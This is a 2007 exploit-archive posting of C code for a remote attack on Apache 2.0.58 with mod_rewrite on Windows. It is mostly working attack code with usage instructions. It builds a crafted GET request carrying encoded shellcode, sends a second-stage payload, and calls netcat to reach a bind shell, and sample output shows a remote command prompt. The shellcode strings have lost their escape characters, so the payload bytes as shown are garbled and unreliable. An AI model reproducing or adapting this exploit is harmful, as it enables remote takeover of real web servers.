Home / exploits apache2058-rewrite.txt
Posted on 31 May 2007
/* apache mod rewrite exploit (win32) By: fabio/b0x (oc-192, old CoTS member) Vuln details: http://www.securityfocus.com/archive/1/archive/1/443870/100/0/threaded Code: bind shell on port 4445, tested on apache 2.0.58 with mod_rewrite (windows 2003) original exploit (http://milw0rm.com/exploits/3680) only had a call back on 192.168.0.1, also was a little buggy, so shellcode was rewriten, thanks to http://metasploit.com/ Usage: ./apache hostname rewrite_path Greetings: caffeine, raver, psikoma, cumatru, insomnia, teddym6, googleman, ares, trickster, rebel and Pentaguard Example: ./apache 192.168.0.253 test [+]Preparing payload [+]Connecting... [+]Connected [+]Sending... [+]Sent [+]Starting second stage... [+]Connecting... [+]Connected [+]Sending... [+]Sent [+]Connecting to shell Microsoft Windows [Version 5.2.3790] (C) Copyright 1985-2003 Microsoft Corp. C:Program FilesApache GroupApache2>exit exit [+]Owned */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <errno.h> #include <string.h> #include <netdb.h> #include <sys/types.h> #include <netinet/in.h> #include <sys/socket.h> #define PORT 80 #define PORT2 4444 #define MAXDATASIZE 1024 char get[] = "/ldap://localhost/%3fA%3fA%3fCCCCCCCCCC%3fC%3f%90"; char shellcode[]= "xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49" "x48x49x49x49x49x49x49x49x49x49x49x49x51x5ax6ax41" "x58x50x30x42x30x41x6bx41x41x51x41x32x41x41x32x42" "x42x42x30x42x41x58x38x41x42x50x75x7ax49x4bx58x56" "x36x73x30x43x30x75x50x70x53x66x35x70x56x31x47x4c" "x4bx50x6cx44x64x55x48x6cx4bx73x75x75x6cx4cx4bx61" "x44x73x35x63x48x35x51x4bx5ax6cx4bx50x4ax37x68x6c" "x4bx42x7ax77x50x37x71x4ax4bx6bx53x44x72x30x49x6e" "x6bx44x74x6ex6bx56x61x68x6ex54x71x39x6fx6bx4cx70" "x31x4bx70x6cx6cx67x48x6bx50x54x34x53x37x6bx71x68" "x4fx44x4dx73x31x78x47x38x6bx38x72x45x6bx73x4cx31" "x34x46x74x52x55x6bx51x6cx4bx63x6ax65x74x56x61x7a" "x4bx32x46x4cx4bx76x6cx70x4bx4ex6bx30x5ax75x4cx67" "x71x5ax4bx6ex6bx74x44x4ex6bx57x71x6bx58x68x6bx76" "x62x50x31x4bx70x33x6fx53x6ex31x4dx63x6bx4bx72x65" "x58x55x50x61x4ex31x7ax36x50x42x79x70x64x4ex6bx74" "x59x6ex6bx43x6bx44x4cx4cx4bx51x4bx77x6cx4cx4bx35" "x4bx6ex6bx31x4bx74x48x73x63x63x58x6cx4ex70x4ex44" "x4ex78x6cx79x6fx4bx66x4dx59x6fx37x4bx31x78x6cx33" "x30x77x71x73x30x47x70x36x37x53x66x51x43x4dx59x69" "x75x39x78x56x47x57x70x37x70x37x70x6ex70x45x51x33" "x30x37x70x4cx76x72x39x55x48x7ax47x6dx74x45x49x54" "x30x4dx39x38x65x77x39x4bx36x50x49x6cx64x35x4ax52" "x50x4fx37x6cx64x4cx6dx76x4ex4dx39x4bx69x45x59x49" "x65x4ex4dx78x4bx4ax4dx6bx4cx77x4bx31x47x50x53x74" "x72x61x4fx46x53x67x42x57x70x61x4bx6cx4dx42x6bx75" "x70x70x51x6bx4fx7ax77x4bx39x4bx6fx4fx79x4fx33x4e" "x6dx71x65x52x34x53x5ax53x37x30x59x50x51x66x33x4b" "x4fx55x64x4cx4fx6bx4fx66x35x43x34x50x59x6ex69x47" "x74x6cx4ex6ax42x58x72x54x6bx64x67x72x74x39x6fx76" "x57x6bx4fx50x55x44x70x30x31x4bx70x50x50x30x50x50" "x50x32x70x77x30x46x30x53x70x70x50x49x6fx63x65x66" "x4cx4bx39x4fx37x30x31x6bx6bx33x63x71x43x42x48x54" "x42x63x30x76x71x63x6cx4cx49x6dx30x52x4ax32x30x32" "x70x36x37x59x6fx52x75x71x34x50x53x70x57x4bx4fx72" "x75x44x68x61x43x62x74x33x67x59x6fx63x65x67x50x4c" "x49x38x47x6dx51x5ax4cx53x30x36x70x53x30x33x30x4e" "x69x4bx53x53x5ax43x30x72x48x53x30x34x50x33x30x33" "x30x50x53x76x37x6bx4fx36x35x74x58x6ex61x4ax4cx67" "x70x35x54x33x30x63x30x49x6fx78x53x41"; char finish[]= "HTTP/1.0 Host: "; char payload2[]= "x31xc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13x18" "xd9x03x3ax83xebxfcxe2xf4xe4xb3xe8x77xf0x20xfcxc5" "xe7xb9x88x56x3cxfdx88x7fx24x52x7fx3fx60xd8xecxb1" "x57xc1x88x65x38xd8xe8x73x93xedx88x3bxf6xe8xc3xa3" "xb4x5dxc3x4ex1fx18xc9x37x19x1bxe8xcex23x8dx27x12" "x6dx3cx88x65x3cxd8xe8x5cx93xd5x48xb1x47xc5x02xd1" "x1bxf5x88xb3x74xfdx1fx5bxdbxe8xd8x5ex93x9ax33xb1" "x58xd5x88x4ax04x74x88x7ax10x87x6bxb4x56xd7xefx6a" "xe7x0fx65x69x7exb1x30x08x70xaex70x08x47x8dxfcxea" "x70x12xeexc6x23x89xfcxecx47x50xe6x5cx99x34x0bx38" "x4dxb3x01xc5xc8xb1xdax33xedx74x54xc5xcex8ax50x69" "x4bx8ax40x69x5bx8axfcxeax7exb1x12x67x7ex8ax8axdb" "x8dxb1xa7x20x68x1ex54xc5xcexb3x13x6bx4dx26xd3x52" "xbcx74x2dxd3x4fx26xd5x69x4dx26xd3x52xfdx90x85x73" "x4fx26xd5x6ax4cx8dx56xc5xc8x4ax6bxddx61x1fx7ax6d" "xe7x0fx56xc5xc8xbfx69x5ex7exb1x60x57x91x3cx69x6a" "x41xf0xcfxb3xffxb3x47xb3xfaxe8xc3xc9xb2x27x41x17" "xe6x9bx2fxa9x95xa3x3bx91xb3x72x6bx48xe6x6ax15xc5" "x6dx9dxfcxecx43x8ex51x6bx49x88x69x3bx49x88x56x6b" "xe7x09x6bx97xc1xdcxcdx69xe7x0fx69xc5xe7xeexfcxea" "x93x8exffxb9xdcxbdxfcxecx4ax26xd3x52xe8x53x07x65" "x4bx26xd5xc5xc8xd9x03x3a"; int main(int argc, char *argv[]) { int sockfd, numbytes; char buf[MAXDATASIZE]; struct hostent *he; struct sockaddr_in their_addr; printf(" Exploit: apache mod rewrite exploit (win32) " " By: fabio/b0x (oc-192, old CoTS member) " "Greetings: caffeine, raver, psikoma, cumatru, insomnia, teddym6, googleman, ares, trickster, rebel and Pentaguard " ); if (argc != 3) { printf(" Usage: ./apache hostname rewrite_path "); exit(1); } printf(" [+]Preparing payload "); char payload[748]; sprintf(payload,"GET /%s%s%s%s%s �",argv[2],get,shellcode,finish,argv[1]); printf("[+]Connecting... "); if ((he=gethostbyname(argv[1])) == NULL) { printf("[-]Cannot resolv hostname... "); exit(1); } if ((sockfd = socket(PF_INET, SOCK_STREAM, 0)) == -1) { printf("[-]Socket error... "); exit(1); } their_addr.sin_family = AF_INET; their_addr.sin_port = htons(PORT); their_addr.sin_addr = *((struct in_addr *)he->h_addr); memset(their_addr.sin_zero, '�', sizeof their_addr.sin_zero); if (connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1) { printf("[-]Unable to connect "); exit(1); } printf("[+]Connected [+]Sending... "); if (send(sockfd, payload, strlen(payload), 0) == -1){ printf("[-]Unable to send "); exit(1); } printf("[+]Sent "); close(sockfd); printf("[+]Starting second stage... "); sleep(3); printf("[+]Connecting... "); if ((he=gethostbyname(argv[1])) == NULL) { printf("[-]Cannot resolv hostname... "); exit(1); } if ((sockfd = socket(PF_INET, SOCK_STREAM, 0)) == -1) { printf("[-]Socket error... "); exit(1); } their_addr.sin_family = AF_INET; their_addr.sin_port = htons(PORT2); their_addr.sin_addr = *((struct in_addr *)he->h_addr); memset(their_addr.sin_zero, '�', sizeof their_addr.sin_zero); if (connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1) { printf("[-]Unable to connect "); exit(1); } printf("[+]Connected [+]Sending... "); if (send(sockfd, payload2, strlen(payload2), 0) == -1){ printf("[-]Unable to send "); exit(1); } printf("[+]Sent [+]Connecting to shell "); close(sockfd); sleep(3); int exec; char what[1024]; sprintf(what," nc -w 10 %s 4445",argv[1]); exec=system(what); if (exec!=0){ printf("[-]Not hacked "); } else { printf("[+]Owned "); } exit(1); }
